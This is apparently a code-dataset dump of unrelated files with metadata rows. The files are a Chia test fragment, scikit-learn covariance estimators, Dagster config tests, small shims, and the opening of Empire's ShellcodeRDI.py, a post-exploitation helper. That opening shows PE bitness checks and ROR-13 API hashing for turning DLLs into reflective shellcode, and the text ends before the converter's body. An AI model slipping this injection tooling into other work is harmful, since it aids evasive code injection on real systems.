await full_node_api.respond_transaction(RespondTransaction(tx), fake_wallet_peer)
await time_out_assert(15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx.name())
# Create more blocks than recent "short_sync_blocks_behind_threshold" so that node enters batch
for i in range(0, 100):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
node1_height = full_node_api_1.full_node.blockchain.get_peak_height()
assert node1_height is None
await fn_server_1.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
node0_height = full_node_api.full_node.blockchain.get_peak_height()
await time_out_assert(15, full_node_api_1.full_node.blockchain.get_peak_height, node0_height)
all_messages = await self.get_all_messages_in_queue(incoming_queue)
all_messages_1 = await self.get_all_messages_in_queue(incoming_queue_1)
def check_messages_for_hint(messages):
notified_state = None
for message in messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
notified_state = data_response
break
assert notified_state is not None
assert notified_state.items[0].coin == Coin(coin_spent.name(), hint_puzzle_hash, amount)
check_messages_for_hint(all_messages)
check_messages_for_hint(all_messages_1)
| 46.052632 | 118 | 0.712555 | 4,032 | 30,625 | 5.024058 | 0.067708 | 0.05055 | 0.051044 | 0.048181 | 0.837291 | 0.801994 | 0.77973 | 0.774004 | 0.750407 | 0.731747 | 0 | 0.014943 | 0.219886 | 30,625 | 664 | 119 | 46.121988 | 0.83295 | 0.024163 | 0 | 0.614481 | 0 | 0 | 0.001373 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 1 | 0.005871 | false | 0 | 0.056751 | 0 | 0.07045 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0acb00d98681d6db1f2d6eb04777d57c01d09d8d | 17,960 | py | Python | python/sklearn/sklearn/covariance/shrunk_covariance_.py | seckcoder/lang-learn | 1e0d6f412bbd7f89b1af00293fd907ddb3c1b571 | [
"Unlicense"
] | 1 | 2017-10-14T04:23:45.000Z | 2017-10-14T04:23:45.000Z | python/sklearn/sklearn/covariance/shrunk_covariance_.py | seckcoder/lang-learn | 1e0d6f412bbd7f89b1af00293fd907ddb3c1b571 | [
"Unlicense"
] | null | null | null | python/sklearn/sklearn/covariance/shrunk_covariance_.py | seckcoder/lang-learn | 1e0d6f412bbd7f89b1af00293fd907ddb3c1b571 | [
"Unlicense"
] | null | null | null | """
Covariance estimators using shrinkage.
Shrinkage corresponds to regularising `cov` using a convex combination:
shrunk_cov = (1-shrinkage)*cov + shrinkage*structured_estimate.
"""
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Virgile Fritsch <virgile.fritsch@inria.fr>
#
# License: BSD Style.
# avoid division truncation
from __future__ import division
import warnings
import numpy as np
from .empirical_covariance_ import empirical_covariance, EmpiricalCovariance
from ..utils import array2d
###############################################################################
# ShrunkCovariance estimator
def shrunk_covariance(emp_cov, shrinkage=0.1):
"""Calculates a covariance matrix shrunk on the diagonal
Parameters
----------
emp_cov: array-like, shape (n_features, n_features)
Covariance matrix to be shrunk
shrinkage: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Returns
-------
shrunk_cov: array-like
shrunk covariance
Notes
-----
The regularized (shrunk) covariance is given by
(1 - shrinkage)*cov
+ shrinkage*mu*np.identity(n_features)
where mu = trace(cov) / n_features
"""
emp_cov = array2d(emp_cov)
n_features = emp_cov.shape[0]
mu = np.trace(emp_cov) / n_features
shrunk_cov = (1. - shrinkage) * emp_cov
shrunk_cov.flat[::n_features + 1] += shrinkage * mu
return shrunk_cov
class ShrunkCovariance(EmpiricalCovariance):
"""Covariance estimator with shrinkage
Parameters
----------
store_precision : bool
Specify if the estimated precision is stored
shrinkage: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Attributes
----------
`covariance_` : array-like, shape (n_features, n_features)
Estimated covariance matrix
`precision_` : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
`shrinkage`: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularized covariance is given by
(1 - shrinkage)*cov
+ shrinkage*mu*np.identity(n_features)
where mu = trace(cov) / n_features
"""
def __init__(self, store_precision=True, assume_centered=False,
shrinkage=0.1):
EmpiricalCovariance.__init__(self, store_precision=store_precision,
assume_centered=assume_centered)
self.shrinkage = shrinkage
def fit(self, X, y=None):
""" Fits the shrunk covariance model
according to the given training data and parameters.
Parameters
----------
X: array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples
and n_features is the number of features.
y: not used, present for API consistence purpose.
assume_centered: Boolean
If True, data are not centered before computation.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, data are centered before computation.
Returns
-------
self: object
Returns self.
"""
# Not calling the parent object to fit, to avoid a potential
# matrix inversion when setting the precision
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
covariance = empirical_covariance(X,
assume_centered=self.assume_centered)
covariance = shrunk_covariance(covariance, self.shrinkage)
self._set_covariance(covariance)
return self
###############################################################################
# Ledoit-Wolf estimator
def ledoit_wolf_shrinkage(X, assume_centered=False, block_size=1000):
"""Estimates the shrunk Ledoit-Wolf covariance matrix.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Data from which to compute the Ledoit-Wolf shrunk covariance shrinkage
assume_centered: Boolean
If True, data are not centered before computation.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, data are centered before computation.
block_size: int,
Size of the blocks into which the covariance matrix will be split.
Returns
-------
shrinkage: float
Coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularized (shrunk) covariance is:
(1 - shrinkage)*cov
+ shrinkage * mu * np.identity(n_features)
where mu = trace(cov) / n_features
"""
X = np.asarray(X)
# for only one feature, the result is the same whatever the shrinkage
if len(X.shape) == 2 and X.shape[1] == 1:
return 0.
if X.ndim == 1:
X = np.reshape(X, (1, -1))
warnings.warn("Only one sample available. " \
"You may want to reshape your data array")
n_samples = 1
n_features = X.size
else:
n_samples, n_features = X.shape
# optionaly center data
if not assume_centered:
X = X - X.mean(0)
# number of blocks to split the covariance matrix into
n_splits = int(n_features / block_size)
X2 = X ** 2
emp_cov_trace = np.sum(X2, axis=0) / n_samples
mu = np.sum(emp_cov_trace) / n_features
beta_ = 0. # sum of the coefficients of <X2.T, X2>
delta_ = 0. # sum of the *squared* coefficients of <X.T, X>
# starting block computation
for i in xrange(n_splits):
for j in xrange(n_splits):
rows = slice(block_size * i, block_size * (i + 1))
cols = slice(block_size * j, block_size * (j + 1))
beta_ += np.sum(np.dot(X2.T[rows], X2[:, cols]))
delta_ += np.sum(np.dot(X.T[rows], X[:, cols]) ** 2)
rows = slice(block_size * i, block_size * (i + 1))
beta_ += np.sum(np.dot(X2.T[rows], X2[:, block_size * n_splits:]))
delta_ += np.sum(
np.dot(X.T[rows], X[:, block_size * n_splits:]) ** 2)
for j in xrange(n_splits):
cols = slice(block_size * j, block_size * (j + 1))
beta_ += np.sum(np.dot(X2.T[block_size * n_splits:], X2[:, cols]))
delta_ += np.sum(
np.dot(X.T[block_size * n_splits:], X[:, cols]) ** 2)
delta_ += np.sum(np.dot(X.T[block_size * n_splits:],
X[:, block_size * n_splits:]) ** 2)
delta_ /= n_samples ** 2
beta_ += np.sum(np.dot(
X2.T[block_size * n_splits:], X2[:, block_size * n_splits:]))
# use delta_ to compute beta
beta = 1. / (n_features * n_samples) * (beta_ / n_samples - delta_)
# delta is the sum of the squared coefficients of (<X.T,X> - mu*Id) / p
delta = delta_ - 2. * mu * emp_cov_trace.sum() + n_features * mu ** 2
delta /= n_features
# get final beta as the min between beta and delta
beta = min(beta, delta)
# finally get shrinkage
shrinkage = beta / delta
return shrinkage
def ledoit_wolf(X, assume_centered=False, block_size=1000):
"""Estimates the shrunk Ledoit-Wolf covariance matrix.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Data from which to compute the covariance estimate
assume_centered: Boolean
If True, data are not centered before computation.
Usefull to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, data are centered before computation.
block_size: int,
Size of the blocks into which the covariance matrix will be split.
If n_features > `block_size`, an error will be raised since the
shrunk covariance matrix will be considered as too large regarding
the available memory.
Returns
-------
shrunk_cov: array-like, shape (n_features, n_features)
Shrunk covariance.
shrinkage: float
Coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularized (shrunk) covariance is:
(1 - shrinkage)*cov
+ shrinkage * mu * np.identity(n_features)
where mu = trace(cov) / n_features
"""
X = np.asarray(X)
# for only one feature, the result is the same whatever the shrinkage
if len(X.shape) == 2 and X.shape[1] == 1:
if not assume_centered:
X = X - X.mean()
return np.atleast_2d((X ** 2).mean()), 0.
if X.ndim == 1:
X = np.reshape(X, (1, -1))
warnings.warn("Only one sample available. " \
"You may want to reshape your data array")
n_samples = 1
n_features = X.size
else:
n_samples, n_features = X.shape
if n_features > block_size:
raise MemoryError("LW: n_features is too large, " +
"try increasing block_size")
# get Ledoit-Wolf shrinkage
shrinkage = ledoit_wolf_shrinkage(
X, assume_centered=assume_centered, block_size=block_size)
emp_cov = empirical_covariance(X, assume_centered=assume_centered)
mu = np.sum(np.trace(emp_cov)) / n_features
shrunk_cov = (1. - shrinkage) * emp_cov
shrunk_cov.flat[::n_features + 1] += shrinkage * mu
return shrunk_cov, shrinkage
class LedoitWolf(EmpiricalCovariance):
"""LedoitWolf Estimator
Ledoit-Wolf is a particular form of shrinkage, where the shrinkage
coefficient is computed using O. Ledoit and M. Wolf's formula as
described in "A Well-Conditioned Estimator for Large-Dimensional
Covariance Matrices", Ledoit and Wolf, Journal of Multivariate
Analysis, Volume 88, Issue 2, February 2004, pages 365-411.
Parameters
----------
store_precision : bool
Specify if the estimated precision is stored
assume_centered: bool
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False (default), data are centered before computation.
block_size: int,
Size of the blocks into which the covariance matrix will be split
during its Ledoit-Wolf estimation.
If n_features > `block_size`, an error will be raised since the
shrunk covariance matrix will be considered as too large regarding
the available memory.
Attributes
----------
`covariance_` : array-like, shape (n_features, n_features)
Estimated covariance matrix
`precision_` : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
`shrinkage_`: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularised covariance is::
(1 - shrinkage)*cov
+ shrinkage*mu*np.identity(n_features)
where mu = trace(cov) / n_features
and shinkage is given by the Ledoit and Wolf formula (see References)
References
----------
"A Well-Conditioned Estimator for Large-Dimensional Covariance Matrices",
Ledoit and Wolf, Journal of Multivariate Analysis, Volume 88, Issue 2,
February 2004, pages 365-411.
"""
def __init__(self, store_precision=True, assume_centered=False,
block_size=1000):
EmpiricalCovariance.__init__(self, store_precision=store_precision,
assume_centered=assume_centered)
self.block_size = block_size
def fit(self, X, y=None):
""" Fits the Ledoit-Wolf shrunk covariance model
according to the given training data and parameters.
Parameters
----------
X: array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples
and n_features is the number of features.
y: not used, present for API consistence purpose.
Returns
-------
self: object
Returns self.
"""
# Not calling the parent object to fit, to avoid computing the
# covariance matrix (and potentially the precision)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
covariance, shrinkage = ledoit_wolf(X - self.location_,
assume_centered=True, block_size=self.block_size)
self.shrinkage_ = shrinkage
self._set_covariance(covariance)
return self
###############################################################################
# OAS estimator
def oas(X, assume_centered=False):
"""Estimate covariance with the Oracle Approximating Shrinkage algorithm.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Data from which to compute the covariance estimate
assume_centered: boolean
If True, data are not centered before computation.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, data are centered before computation.
Returns
-------
shrunk_cov: array-like, shape (n_features, n_features)
Shrunk covariance
shrinkage: float
coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularised (shrunk) covariance is:
(1 - shrinkage)*cov
+ shrinkage * mu * np.identity(n_features)
where mu = trace(cov) / n_features
The formula we used to implement the OAS
does not correspond to the one given in the article. It has been taken
from the MATLAB program available from the author's webpage
(https://tbayes.eecs.umich.edu/yilun/covestimation).
"""
X = np.asarray(X)
# for only one feature, the result is the same whatever the shrinkage
if len(X.shape) == 2 and X.shape[1] == 1:
if not assume_centered:
X = X - X.mean()
return np.atleast_2d((X ** 2).mean()), 0.
if X.ndim == 1:
X = np.reshape(X, (1, -1))
warnings.warn("Only one sample available. " \
"You may want to reshape your data array")
n_samples = 1
n_features = X.size
else:
n_samples, n_features = X.shape
emp_cov = empirical_covariance(X, assume_centered=assume_centered)
mu = np.trace(emp_cov) / n_features
# formula from Chen et al.'s **implementation**
alpha = np.mean(emp_cov ** 2)
num = alpha + mu ** 2
den = (n_samples + 1.) * (alpha - (mu ** 2) / n_features)
shrinkage = min(num / den, 1.)
shrunk_cov = (1. - shrinkage) * emp_cov
shrunk_cov.flat[::n_features + 1] += shrinkage * mu
return shrunk_cov, shrinkage
class OAS(EmpiricalCovariance):
"""
Oracle Approximating Shrinkage Estimator
OAS is a particular form of shrinkage described in
"Shrinkage Algorithms for MMSE Covariance Estimation"
Chen et al., IEEE Trans. on Sign. Proc., Volume 58, Issue 10, October 2010.
The formula used here does not correspond to the one given in the
article. It has been taken from the Matlab program available from the
authors' webpage (https://tbayes.eecs.umich.edu/yilun/covestimation).
Parameters
----------
store_precision : bool
Specify if the estimated precision is stored.
assume_centered: bool
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False (default), data are centered before computation.
Attributes
----------
`covariance_` : array-like, shape (n_features, n_features)
Estimated covariance matrix
`precision_` : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
`shrinkage_`: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularised covariance is::
(1 - shrinkage)*cov
+ shrinkage*mu*np.identity(n_features)
where mu = trace(cov) / n_features
and shinkage is given by the OAS formula (see References)
References
----------
"Shrinkage Algorithms for MMSE Covariance Estimation"
Chen et al., IEEE Trans. on Sign. Proc., Volume 58, Issue 10, October 2010.
"""
def fit(self, X, y=None):
""" Fits the Oracle Approximating Shrinkage covariance model
according to the given training data and parameters.
Parameters
----------
X: array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples
and n_features is the number of features.
y: not used, present for API consistence purpose.
Returns
-------
self: object
Returns self.
"""
# Not calling the parent object to fit, to avoid computing the
# covariance matrix (and potentially the precision)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
covariance, shrinkage = oas(X - self.location_, assume_centered=True)
self.shrinkage_ = shrinkage
self._set_covariance(covariance)
return self
| 32.773723 | 79 | 0.629399 | 2,295 | 17,960 | 4.80305 | 0.126362 | 0.052254 | 0.019051 | 0.020412 | 0.804228 | 0.787444 | 0.761952 | 0.755783 | 0.735281 | 0.699991 | 0 | 0.011647 | 0.268597 | 17,960 | 547 | 80 | 32.833638 | 0.827497 | 0.561581 | 0 | 0.585034 | 0 | 0 | 0.039412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061224 | false | 0 | 0.034014 | 0 | 0.183673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0aef2aafc3dab46bc3e7cadc8c2e0733777ee9f8 | 47 | py | Python | finegrain/__init__.py | SZLSP/reid2020NAIC | d0eaee768e0be606417a27ce5ea2b3071b5a9bc2 | [
"Apache-2.0"
] | 2 | 2021-05-12T13:36:46.000Z | 2021-08-15T10:35:08.000Z | finegrain/__init__.py | SZLSP/reid2020NAIC | d0eaee768e0be606417a27ce5ea2b3071b5a9bc2 | [
"Apache-2.0"
] | 1 | 2021-12-28T12:49:49.000Z | 2021-12-28T12:49:49.000Z | finegrain/__init__.py | SZLSP/reid2020NAIC | d0eaee768e0be606417a27ce5ea2b3071b5a9bc2 | [
"Apache-2.0"
] | null | null | null | from .load_backbone import load_model, load_cfg | 47 | 47 | 0.87234 | 8 | 47 | 4.75 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 47 | 1 | 47 | 47 | 0.883721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7c2b9bc3a8b58b01b15dbe313d2b0572b2044bf8 | 225 | py | Python | roundup/anypy/urllib_.py | zware/bpo-roundup | 68573d196f9a01786414d3b235252b9c857c3e08 | [
"MIT"
] | 4 | 2020-08-01T00:34:14.000Z | 2022-02-27T06:04:12.000Z | roundup/anypy/urllib_.py | zware/bpo-roundup | 68573d196f9a01786414d3b235252b9c857c3e08 | [
"MIT"
] | 1 | 2021-05-17T22:47:26.000Z | 2021-05-25T14:26:06.000Z | roundup/anypy/urllib_.py | zware/bpo-roundup | 68573d196f9a01786414d3b235252b9c857c3e08 | [
"MIT"
] | 3 | 2020-11-13T17:43:43.000Z | 2022-02-27T06:04:13.000Z |
try:
# Python 3+
from urllib.parse import quote, urlencode, urlparse, parse_qs, urlunparse
except:
# Python 2.5-2.7
from urllib import quote, urlencode
from urlparse import urlparse, parse_qs, urlunparse
| 25 | 77 | 0.715556 | 31 | 225 | 5.129032 | 0.516129 | 0.125786 | 0.251572 | 0.314465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028249 | 0.213333 | 225 | 8 | 78 | 28.125 | 0.870057 | 0.106667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7c7abf420a8a5426ff115890e9ef47770ee51350 | 121 | py | Python | modules/publishers/base.py | atthealchemist/graduation-project-system-backend | 1215425208e1708f1ed3d008ea7cffebb36f8e30 | [
"MIT"
] | null | null | null | modules/publishers/base.py | atthealchemist/graduation-project-system-backend | 1215425208e1708f1ed3d008ea7cffebb36f8e30 | [
"MIT"
] | null | null | null | modules/publishers/base.py | atthealchemist/graduation-project-system-backend | 1215425208e1708f1ed3d008ea7cffebb36f8e30 | [
"MIT"
] | null | null | null |
class BasePublisher:
def publish(self):
pass
def __init__(self, params):
self.params = params
| 13.444444 | 31 | 0.603306 | 13 | 121 | 5.307692 | 0.615385 | 0.289855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.31405 | 121 | 8 | 32 | 15.125 | 0.831325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.2 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
7c80ad671e70e750b7edbb9a7a7796d2c69ecb9d | 2,977 | py | Python | python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_source_types.py | chasleslr/dagster | 88907f9473fb8e7a9b1af9a0a8b349d42f4b8153 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_source_types.py | chasleslr/dagster | 88907f9473fb8e7a9b1af9a0a8b349d42f4b8153 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_source_types.py | chasleslr/dagster | 88907f9473fb8e7a9b1af9a0a8b349d42f4b8153 | [
"Apache-2.0"
] | null | null | null | import os
from dagster import Array, IntSource, Noneable, StringSource
from dagster.config.validate import process_config
from dagster.core.test_utils import environ
def test_string_source():
assert process_config(StringSource, "foo").success
assert not process_config(StringSource, 1).success
assert not process_config(StringSource, {"env": 1}).success
assert "DAGSTER_TEST_ENV_VAR" not in os.environ
assert not process_config(StringSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert (
'You have attempted to fetch the environment variable "DAGSTER_TEST_ENV_VAR" '
"which is not set. In order for this execution to succeed it must be set in "
"this environment."
) in process_config(StringSource, {"env": "DAGSTER_TEST_ENV_VAR"}).errors[0].message
with environ({"DAGSTER_TEST_ENV_VAR": "baz"}):
assert process_config(StringSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert process_config(StringSource, {"env": "DAGSTER_TEST_ENV_VAR"}).value == "baz"
def test_int_source():
assert process_config(IntSource, 1).success
assert not process_config(IntSource, "foo").success
assert not process_config(IntSource, {"env": 1}).success
assert "DAGSTER_TEST_ENV_VAR" not in os.environ
assert not process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert (
'You have attempted to fetch the environment variable "DAGSTER_TEST_ENV_VAR" '
"which is not set. In order for this execution to succeed it must be set in "
"this environment."
) in process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).errors[0].message
with environ({"DAGSTER_TEST_ENV_VAR": "4"}):
assert process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).value == 4
with environ({"DAGSTER_TEST_ENV_VAR": "four"}):
assert not process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert (
'Value "four" stored in env variable "DAGSTER_TEST_ENV_VAR" cannot '
"be coerced into an int."
) in process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).errors[0].message
def test_noneable_string_source_array():
assert process_config(Noneable(Array(StringSource)), []).success
assert process_config(Noneable(Array(StringSource)), None).success
assert (
'You have attempted to fetch the environment variable "DAGSTER_TEST_ENV_VAR" '
"which is not set. In order for this execution to succeed it must be set in "
"this environment."
) in process_config(
Noneable(Array(StringSource)), ["test", {"env": "DAGSTER_TEST_ENV_VAR"}]
).errors[
0
].message
with environ({"DAGSTER_TEST_ENV_VAR": "baz"}):
assert process_config(
Noneable(Array(StringSource)), ["test", {"env": "DAGSTER_TEST_ENV_VAR"}]
).success
| 41.347222 | 91 | 0.700034 | 389 | 2,977 | 5.11054 | 0.154242 | 0.084507 | 0.15493 | 0.188129 | 0.834004 | 0.821429 | 0.671026 | 0.671026 | 0.66499 | 0.618209 | 0 | 0.004137 | 0.188109 | 2,977 | 71 | 92 | 41.929577 | 0.81837 | 0 | 0 | 0.425926 | 0 | 0 | 0.343635 | 0.02956 | 0 | 0 | 0 | 0 | 0.407407 | 1 | 0.055556 | true | 0 | 0.074074 | 0 | 0.12963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7c8e163b7e677628ed1ec1ed3c6fe231a1a34bf8 | 213 | py | Python | sandbox/lib/jumpscale/JumpscaleLibsExtra/servers/flaskserver/tests/blueprints/home/routes.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 2 | 2019-05-09T07:21:25.000Z | 2019-08-05T06:37:53.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/servers/flaskserver/tests/blueprints/home/routes.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 664 | 2018-12-19T12:43:44.000Z | 2019-08-23T04:24:42.000Z | Jumpscale/servers/webserver/tests/blueprints/home/routes.py | threefoldtech/jumpscale10 | 5fb073a82aeb0e66fc7d9660c45a1e31bc094bfa | [
"Apache-2.0"
] | 7 | 2019-05-03T07:14:37.000Z | 2019-08-05T12:36:52.000Z | from flask import render_template
from blueprints.home import blueprint
from Jumpscale import j
@blueprint.route("/", methods=["GET"])
def route_index():
# j.shell()
return render_template("index.html")
| 21.3 | 40 | 0.737089 | 28 | 213 | 5.5 | 0.642857 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140845 | 213 | 9 | 41 | 23.666667 | 0.84153 | 0.042254 | 0 | 0 | 0 | 0 | 0.069307 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.5 | 0.166667 | 0.833333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
7cb0e08c65bfafcd5955705e10c63f5e6a4a70f3 | 32 | py | Python | topsis/__init__.py | SAH-UJA/topsis | e83b0862768118f1298fbc122c6c057a53ed291f | [
"MIT"
] | null | null | null | topsis/__init__.py | SAH-UJA/topsis | e83b0862768118f1298fbc122c6c057a53ed291f | [
"MIT"
] | 2 | 2020-01-15T19:11:00.000Z | 2020-01-19T15:36:10.000Z | topsis/__init__.py | SAH-UJA/topsis | e83b0862768118f1298fbc122c6c057a53ed291f | [
"MIT"
] | null | null | null | from topsis.topsis import Topsis | 32 | 32 | 0.875 | 5 | 32 | 5.6 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7ccd458aea7875e4734ea709e662eaa39a59abc9 | 16,776 | py | Python | lib/common/ShellcodeRDI.py | terrorizer1980/Empire | 9259e5106986847d2bb770c4289c0c0f1adf2344 | [
"BSD-3-Clause"
] | 49 | 2015-09-02T15:20:09.000Z | 2022-03-05T18:18:23.000Z | lib/common/ShellcodeRDI.py | rmusser01/Empire | c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556 | [
"BSD-3-Clause"
] | 1 | 2020-11-04T08:15:12.000Z | 2020-11-04T08:15:12.000Z | lib/common/ShellcodeRDI.py | InfinitelyFreedom/Empire | 3a922f60d92658fb716efb3be5a1c15074114766 | [
"BSD-3-Clause"
] | 24 | 2015-09-08T11:45:23.000Z | 2022-02-07T23:53:58.000Z | #!/usr/bin/python3
# Author: Nick Landers (@monogas)
from struct import pack
import pefile
def is64BitDLL(bytes):
pe = pefile.PE(data=bytes, fast_load=True)
return (pe.OPTIONAL_HEADER.Magic == 0x20b)
ror = lambda val, r_bits, max_bits: \
((val & (2 ** max_bits - 1)) >> r_bits % max_bits) | \
(val << (max_bits - (r_bits % max_bits)) & (2 ** max_bits - 1))
def HashFunctionName(name, module=None):
function = name.encode('UTF-16LE') + b'\x00'
if (module):
module = module.upper().encode('UTF-16LE') + b'\x00\x00'
functionHash = 0
for b in function:
functionHash = ror(functionHash, 13, 32)
functionHash += b
moduleHash = 0
for b in module:
moduleHash = ror(moduleHash, 13, 32)
moduleHash += b
functionHash += moduleHash
if functionHash > 0xFFFFFFFF: functionHash -= 0x100000000
else:
functionHash = 0
for b in function:
functionHash = ror(functionHash, 13, 32)
functionHash += b
return functionHash
def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
